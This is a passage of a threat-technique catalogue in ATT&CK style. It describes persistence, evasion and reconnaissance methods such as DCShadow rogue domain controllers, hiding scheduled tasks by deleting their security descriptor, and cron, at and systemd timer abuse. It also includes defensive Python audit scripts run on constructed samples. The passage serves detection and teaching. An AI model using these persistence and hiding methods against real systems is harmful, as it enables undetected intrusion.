Mobile devices may also be used to infect PCs with malware if connected via USB.<sup>[[Exploiting Smartphone USB ](https://app.tidalcyber.com/references/573796bd-4553-4ae1-884a-9af71b5de873)]</sup> This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.<sup>[[Windows Malware Infecting Android](https://app.tidalcyber.com/references/3733386a-14bd-44a6-8241-a10660ba25d9)]</sup><sup>[[iPhone Charging Cable Hack](https://app.tidalcyber.com/references/b8bb0bc5-e131-47b5-8c42-48cd3dc25250)]</sup> For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).

The tag is: misp-galaxy:technique="Replication Through Removable Media"

Resource Hijacking

Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.

One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.<sup>[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]</sup> Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.<sup>[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)]</sup> Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.<sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup><sup>[[Trend Micro Exposed Docker APIs](https://app.tidalcyber.com/references/24ae5092-42ea-4c83-bdf7-c0e5026d9559)]</sup>

Additionally, some cryptocurrency mining malware identifies and then kills off processes belonging to competing malware, so that it is not competing for resources.<sup>[[Trend Micro War of Crypto Miners](https://app.tidalcyber.com/references/1ba47efe-35f8-4d52-95c7-65cdc829c8e5)]</sup>

Adversaries may also use malware that leverages a system’s network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311) campaigns and/or to seed malicious torrents.<sup>[[GoBotKR](https://app.tidalcyber.com/references/7d70675c-5520-4c81-8880-912ce918c4b5)]</sup> Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.<sup>[[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]</sup>

The tag is: misp-galaxy:technique="Resource Hijacking"

Rogue Domain Controller

Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup> Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. <sup>[[Adsecurity Mimikatz Guide](https://app.tidalcyber.com/references/b251ed65-a145-4053-9dc2-bf0dad83d76c)]</sup>

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup> The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup>

The tag is: misp-galaxy:technique="Rogue Domain Controller"

Rootkit

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. <sup>[[Symantec Windows Rootkits](https://app.tidalcyber.com/references/5b8d9094-dabf-4c29-a95b-b90dbcf07382)]</sup>

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://app.tidalcyber.com/technique/4050dbda-5cb0-4bd6-8444-841e55611f3a). <sup>[[Wikipedia Rootkit](https://app.tidalcyber.com/references/7e877b6b-9873-48e2-b138-e02dcb5268ca)]</sup> Rootkits have been seen for Windows, Linux, and Mac OS X systems. <sup>[[CrowdStrike Linux Rootkit](https://app.tidalcyber.com/references/eb3590bf-ff12-4ccd-bf9d-cf8eacd82135)]</sup> <sup>[[BlackHat Mac OSX Rootkit](https://app.tidalcyber.com/references/e01a6d46-5b38-42df-bd46-3995d38bb60e)]</sup>

The tag is: misp-galaxy:technique="Rootkit"

At

Adversaries may abuse the [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. In Windows environments it is deprecated in favor of [Scheduled Task](https://app.tidalcyber.com/technique/723c6d51-91db-4658-9ee0-eafb953c2d82)'s [schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5); using [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) there requires that the Task Scheduler service be running and that the user be logged on as a member of the local Administrators group.

On Linux and macOS, [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860). If the <code>at.deny</code> exists and is empty, global use of [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860).<sup>[[Linux at](https://app.tidalcyber.com/references/3e3a84bc-ab6d-460d-8abc-cafae6eaaedd)]</sup>
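The at.allow/at.deny rules above are easy to misread during a hardening review, in particular the case where an empty at.deny opens the utility to every user. The following added example (not code from the MISP galaxy or Tidal Cyber) encodes the rules as stated in this entry and audits a directory for the policy in effect; the directory layout and the sample at.deny are constructed, and treating `#` lines as comments is a convenience of this example.

```python
import os
import tempfile


def read_access_file(path):
    """Return the set of usernames listed in an access file, or None if the file is absent.

    Blank lines and lines starting with '#' are skipped (a convenience for this example).
    """
    if not os.path.exists(path):
        return None
    with open(path) as fh:
        return {line.strip() for line in fh
                if line.strip() and not line.lstrip().startswith("#")}


def at_permitted(username, allow, deny, superuser="root"):
    """Apply the rules from the description: allow/deny are None when the file is absent."""
    if username == superuser:
        return True                     # the superuser may always use at
    if allow is not None:
        return username in allow        # at.allow exists: only listed users
    if deny is not None:
        return username not in deny     # at.deny only: everyone not listed; empty file = everyone
    return False                        # neither file: superuser only


def audit_at_policy(etc_dir):
    """Summarise the policy in effect for the at.allow/at.deny pair under etc_dir."""
    allow = read_access_file(os.path.join(etc_dir, "at.allow"))
    deny = read_access_file(os.path.join(etc_dir, "at.deny"))
    if allow is not None:
        return ("allow-list", sorted(allow))
    if deny is not None:
        if not deny:
            return ("global-use-permitted", [])   # the case worth flagging in a review
        return ("deny-list", sorted(deny))
    return ("superuser-only", [])


def demo():
    """Audit a constructed directory containing only an at.deny with one entry."""
    etc = tempfile.mkdtemp()
    with open(os.path.join(etc, "at.deny"), "w") as fh:
        fh.write("# constructed sample at.deny\nguest\n")
    return audit_at_policy(etc)


if __name__ == "__main__":
    print(demo())
    for user in ("root", "alice", "guest"):
        print(user, at_permitted(user, None, {"guest"}))
```

On a real host the files live under /etc (and at.deny is often pre-populated by the distribution); pointing `audit_at_policy` at that directory reports which of the four cases applies.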

Adversaries may use [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) to execute programs at system startup or on a scheduled basis for [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393). [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) can also be abused to conduct remote [Execution](https://app.tidalcyber.com/tactics/dad2337d-6d35-410a-acc5-da36ff83ee44) as part of [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and/or to run a process under the context of a specified account (such as SYSTEM).

In Linux environments, adversaries may also abuse [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) may also be used for [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37) if the binary is allowed to run as superuser via <code>sudo</code>.<sup>[[GTFObins at](https://app.tidalcyber.com/references/3fad6618-5a85-4f7a-be2b-0600269d7768)]</sup>

The tag is: misp-galaxy:technique="At"

Container Orchestration Job

Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.

In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.<sup>[[Kubernetes Jobs](https://app.tidalcyber.com/references/21a4388d-dbf8-487b-a2a2-67927b099e4a)]</sup><sup>[[Kubernetes CronJob](https://app.tidalcyber.com/references/354d242c-227e-4827-b559-dc1650d37acd)]</sup> An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.<sup>[[Threat Matrix for Kubernetes](https://app.tidalcyber.com/references/43fab719-e348-4902-8df3-8807765b95f0)]</sup>

The tag is: misp-galaxy:technique="Container Orchestration Job"

Cron

Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.<sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup> The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code>crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths.

An adversary may use <code>cron</code> in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393).
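To review crontab contents for the two patterns named here (execution at system startup and on a schedule), a parser that separates the trigger from the command is the first step. The following is an added example, not code from the MISP galaxy or Tidal Cyber; the crontab text is constructed. It handles both the user crontab format (five time fields, then the command) and the system crontab format, which carries a user field before the command.

```python
import re

# Constructed user crontab (not from any real host).
SAMPLE_USER_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
@reboot /home/alice/.cache/.update.sh
*/5 * * * * /usr/bin/backup --quiet
0 3 * * 1-5 /opt/reports/nightly.sh > /dev/null 2>&1
@daily /usr/bin/logrotate-user
"""

ALIASES = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly",
           "@daily", "@midnight", "@hourly"}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


def parse_crontab(text, system=False):
    """Return one dict per job: trigger ('startup' for @reboot, else the schedule), user, command.

    system=True selects the /etc/crontab layout, where a user field precedes the command.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue                                  # comments and variable assignments
        if line.startswith("@"):
            fields = line.split(None, 1)
            if fields[0] not in ALIASES or len(fields) < 2:
                continue
            schedule, rest = fields[0], fields[1]
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue                              # malformed: fewer than five time fields
            schedule, rest = " ".join(fields[:5]), fields[5]
        user = None
        if system:
            parts = rest.split(None, 1)
            if len(parts) < 2:
                continue
            user, rest = parts
        entries.append({"trigger": "startup" if schedule == "@reboot" else schedule,
                        "user": user, "command": rest})
    return entries


def startup_entries(text, system=False):
    """Jobs that run at system startup, the persistence case the description calls out."""
    return [e for e in parse_crontab(text, system) if e["trigger"] == "startup"]


if __name__ == "__main__":
    for entry in parse_crontab(SAMPLE_USER_CRONTAB):
        print(f"{entry['trigger']:>12}  {entry['command']}")
```

Feeding the output into a baseline of expected commands per user turns this into a simple drift check; the parser deliberately keeps the full command string (including redirections) so that nothing is lost before comparison.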

The tag is: misp-galaxy:technique="Cron"

Scheduled Task

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.

The deprecated [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility could also be abused by adversaries (ex: [At](https://app.tidalcyber.com/technique/6051e618-c476-41db-8b0b-0aef9d2bbbf7)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.<sup>[[ProofPoint Serpent](https://app.tidalcyber.com/references/c2f7958b-f521-4133-9aeb-c5c8fae23e78)]</sup>

Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://app.tidalcyber.com/technique/f37f0cd5-0446-415f-9309-94e25aa1165d)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from schtasks /query and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).<sup>[[SigmaHQ](https://app.tidalcyber.com/references/27812e3f-9177-42ad-8681-91c65aba4743)]</sup><sup>[[Tarrask scheduled task](https://app.tidalcyber.com/references/87682623-d1dd-4ee8-ae68-b08be5113e3e)]</sup> Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., Index value) within associated registry keys.<sup>[[Defending Against Scheduled Task Attacks in Windows Environments](https://app.tidalcyber.com/references/111d21df-5531-4927-a173-fac9cd7672b3)]</sup>
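Because a task hidden by deleting its Security Descriptor value is absent from schtasks /query, the registry itself is the place to look. The following added example (not code from the MISP galaxy, Tidal Cyber or the cited reports) parses a `reg export`-style dump of the TaskCache Tree key and lists task nodes that carry an Id but no SD value. The dump, the task names and the GUIDs are constructed placeholders; treating a node without an Id as something other than a task is an assumption of this example.

```python
import re

# Constructed excerpt in the shape of a "reg export" of the TaskCache\Tree key.
# GUIDs and SD bytes are placeholders, not real values.
TREE_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Schedule\TaskCache\Tree")
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Defrag\ScheduledDefrag]
"Id"="{00000000-0000-0000-0000-000000000001}"
"Index"=dword:00000003
"SD"=hex:01,00,04,80,14,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Updater]
"Id"="{00000000-0000-0000-0000-000000000002}"
"Index"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Backup\Nightly]
"Id"="{00000000-0000-0000-0000-000000000003}"
"Index"=dword:00000003
"SD"=hex:01,00,04,80,14,00,00,00
"""

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg_export(text):
    """Parse a .reg text dump into {key path: {value name: raw value}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_LINE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(2)
    return keys


def find_hidden_tasks(keys):
    """Return Tree-relative paths of task nodes (nodes with an Id) that lack an SD value."""
    hidden = []
    for path, values in keys.items():
        if not path.startswith(TREE_PREFIX + "\\"):
            continue
        if "Id" in values and "SD" not in values:
            hidden.append(path[len(TREE_PREFIX) + 1:])
    return hidden


if __name__ == "__main__":
    for task in find_hidden_tasks(parse_reg_export(SAMPLE_REG_EXPORT)):
        print("task without SD value (hidden from schtasks /query):", task)
```

On a live host the same check can be run against a dump taken with `reg export` of the Tree key; comparing the result with the output of schtasks /query confirms which entries the enumeration tooling no longer shows.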

The tag is: misp-galaxy:technique="Scheduled Task"

Systemd Timers

Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://app.tidalcyber.com/technique/803d286d-8104-4af8-9821-3f49240edc2b) in Linux environments.<sup>[[archlinux Systemd Timers Aug 2020](https://app.tidalcyber.com/references/670f02f1-3927-4f38-aa2b-9ca0d8cf5b8e)]</sup> Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474).<sup>[[Systemd Remote Control](https://app.tidalcyber.com/references/0461b58e-400e-4e3e-b7c4-eed7a9b0fdd6)]</sup>

Each <code>.timer</code> file must have a corresponding <code>.service</code> file with the same name, e.g., <code>example.timer</code> and <code>example.service</code>. <code>.service</code> files are [Systemd Service](https://app.tidalcyber.com/technique/7aae1ad0-fb1f-484a-a176-c94e4c7ada77) unit files that are managed by the systemd system and service manager.<sup>[[Linux man-pages: systemd January 2014](https://app.tidalcyber.com/references/e9a58efd-8de6-40c9-9638-c642311d6a07)]</sup> Privileged timers are written to <code>/etc/systemd/system/</code> and <code>/usr/lib/systemd/system</code> while user level are written to <code>~/.config/systemd/user/</code>.

An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.<sup>[[Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018](https://app.tidalcyber.com/references/0654dabf-e885-45bf-8a8e-2b512ff4bf46)]</sup><sup>[[gist Arch package compromise 10JUL2018](https://app.tidalcyber.com/references/b2900049-444a-4fe5-af1f-b9cd2cd9491c)]</sup><sup>[[acroread package compromised Arch Linux Mail 8JUL2018](https://app.tidalcyber.com/references/99245022-2130-404d-bf7a-095d84a515cd)]</sup> Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.<sup>[[Falcon Sandbox smp: 28553b3a9d](https://app.tidalcyber.com/references/f27ab4cb-1666-501a-aa96-537d2b2d1f08)]</sup>
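The three facts above (timer and service share a name, timers are either calendar-based or relative to a starting point, and the install path decides whether persistence is root-level or user-level) map directly onto an audit. The following is an added example, not code from the MISP galaxy or Tidal Cyber: it walks the privileged and user unit directories named in the entry, classifies each timer, and reports the ExecStart of its matching service. The directory tree it audits is constructed in a temporary directory; the unit-file parser is a minimal one written for this example and does not cover every systemd syntax feature.

```python
import os
import tempfile

PRIVILEGED_DIRS = ("etc/systemd/system", "usr/lib/systemd/system")
USER_DIR = ".config/systemd/user"          # relative to a home directory
MONOTONIC_KEYS = {"OnActiveSec", "OnBootSec", "OnStartupSec",
                  "OnUnitActiveSec", "OnUnitInactiveSec"}


def parse_unit(path):
    """Minimal unit-file parse: {section: [(key, value), ...]} (repeated keys are kept)."""
    sections, current = {}, None
    with open(path) as fh:
        for raw in fh:
            line = raw.strip()
            if not line or line[0] in "#;":
                continue
            if line.startswith("[") and line.endswith("]"):
                current = line[1:-1]
                sections.setdefault(current, [])
            elif "=" in line and current is not None:
                key, value = line.split("=", 1)
                sections[current].append((key.strip(), value.strip()))
    return sections


def audit_timers(root, home_dirs):
    """List every .timer under the privileged dirs below root and the user dir of each home."""
    findings = []
    search = [(os.path.join(root, d), "privileged") for d in PRIVILEGED_DIRS]
    search += [(os.path.join(h, USER_DIR), "user") for h in home_dirs]
    for directory, scope in search:
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            if not name.endswith(".timer"):
                continue
            timer_keys = [k for k, _ in parse_unit(os.path.join(directory, name)).get("Timer", [])]
            if "OnCalendar" in timer_keys:
                kind = "calendar"                  # runs on a calendar event
            elif any(k in MONOTONIC_KEYS for k in timer_keys):
                kind = "monotonic"                 # runs after a span relative to a starting point
            else:
                kind = "unknown"
            service_path = os.path.join(directory, name[:-len(".timer")] + ".service")
            exec_start = None
            if os.path.exists(service_path):
                exec_start = [v for k, v in parse_unit(service_path).get("Service", []) if k == "ExecStart"]
            findings.append({"timer": name, "scope": scope, "kind": kind,
                             "service_present": exec_start is not None, "exec_start": exec_start})
    return findings


def demo():
    """Build a constructed unit layout in a temp dir and audit it."""
    root = tempfile.mkdtemp()
    home = os.path.join(root, "home", "alice")

    def put(relpath, content):
        path = os.path.join(root, relpath)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)

    put("etc/systemd/system/backup.timer", "[Timer]\nOnCalendar=daily\n\n[Install]\nWantedBy=timers.target\n")
    put("etc/systemd/system/backup.service", "[Service]\nExecStart=/usr/local/bin/backup.sh\n")
    put("usr/lib/systemd/system/cleanup.timer", "[Timer]\nOnBootSec=5min\n")   # no cleanup.service
    put("home/alice/.config/systemd/user/sync.timer", "[Timer]\nOnUnitActiveSec=1h\n")
    put("home/alice/.config/systemd/user/sync.service", "[Service]\nExecStart=/home/alice/.local/bin/sync\n")
    return audit_timers(root, [home])


if __name__ == "__main__":
    for f in demo():
        print(f"{f['scope']:>10} {f['kind']:>9} {f['timer']:<16} service={f['service_present']} exec={f['exec_start']}")
```

Running `audit_timers("/", ["/home/<user>", ...])` on a real host gives the same table; a timer whose service is missing, or whose ExecStart points outside the expected package paths, is the entry to examine first.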

The tag is: misp-galaxy:technique="Systemd Timers"

Scheduled Task/Job

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.<sup>[[TechNet Task Scheduler Security](https://app.tidalcyber.com/references/3a6d08ba-d79d-46f7-917d-075a98c59228)]</sup>

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.<sup>[[ProofPoint Serpent](https://app.tidalcyber.com/references/c2f7958b-f521-4133-9aeb-c5c8fae23e78)]</sup>

The tag is: misp-galaxy:technique="Scheduled Task/Job"

Scheduled Transfer

Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.

When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) or [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).

The tag is: misp-galaxy:technique="Scheduled Transfer"

Screen Capture

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.<sup>[[CopyFromScreen .NET](https://app.tidalcyber.com/references/b9733af4-ffb4-416e-884e-d51649aecbce)]</sup><sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup>

The tag is: misp-galaxy:technique="Screen Capture"

Purchase Technical Data

Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.

Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.<sup>[[ZDNET Selling Data](https://app.tidalcyber.com/references/61d00ae2-5494-4c6c-8860-6826e701ade8)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Purchase Technical Data"

Threat Intel Vendors

Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.<sup>[[D3Secutrity CTI Feeds](https://app.tidalcyber.com/references/088f2cbd-cce1-477f-9ffb-319477d74b69)]</sup>

Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Threat Intel Vendors"

Search Closed Sources

Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.<sup>[[D3Secutrity CTI Feeds](https://app.tidalcyber.com/references/088f2cbd-cce1-477f-9ffb-319477d74b69)]</sup> Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.<sup>[[ZDNET Selling Data](https://app.tidalcyber.com/references/61d00ae2-5494-4c6c-8860-6826e701ade8)]</sup>

Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Search Closed Sources"

CDNs

Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.

